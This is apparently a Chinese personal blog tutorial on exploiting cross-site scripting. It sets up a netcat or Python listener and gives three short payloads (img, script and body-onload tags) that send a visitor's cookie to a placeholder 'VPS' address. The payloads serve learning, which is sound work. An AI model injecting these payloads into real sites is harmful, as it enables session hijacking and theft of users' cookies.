XSS利用方式

前言

学习XSS注入很久了，XSS主要的情况三分天下：反射型、存储型、DOM型；今天要研究的是XSS的利用，曾经有人问我XSS怎么利用的，我也只知道XSS在网页中嵌入代码，获取目标IP、Cookie，但是从来没有实践过，今天浏览FreeBuf时，发现一篇XSS利用文章，哈哈哈……于是乎，实践一下……

准备

为了获取目标IP及ookie，实践开始之前，需要准备一个东西：VPS，但是我没办法准备，所以只好一些简单的方法：基本的思想是，获取目标IP，将IP返回到我们指定的IP端口上，我们监听这个端口，获取返回的IP信息。

利用netcat

如果系统中有NC，可以运行命令：

nc -vil 8080

利用python

只要安装了python，并添加了环境变量，就可以在DOS中运行：

Python -m SimpleHTTPServer 8080

注意：这个命令只能在DOS中运行，不能在python交互式环境中运行，否则会出现如下情况：

注意：以上两种方法的DOS窗口都不能关闭，否则失败。

获取IP及Cookie代码

• img标签

document.body.appendChild(document.createElement('img')).setAttribute('src','http://VPS地址:80/?='+document.cookie); >

• script标签

<script>window.location.href='http://VPS地址/?cookie='+document.cookiescript>

• body标签

<body onload=eval(“document.body.appendChild(document.createElement('img')).setAttribute('src','http://VPS地址/?='+document.cookie);”)>body>

过程

1. 先使用命令：Python -m SimpleHTTPServer 8080；
   
   2.使用以上3个标签中的一种编写成HTML文件，并访问；

   • img标签
     

   • img标签运行结果：
     

   • script标签
     

   • script标签运行结果：
     

   • body标签
     

   • body标签运行结果：
     

其实XSS还有其他利用方法，需要更加深入的研究、发掘。但是仅仅获取目标IP绰绰有余了。
参考文章：(http://www.freebuf.com/sectool/159689.html)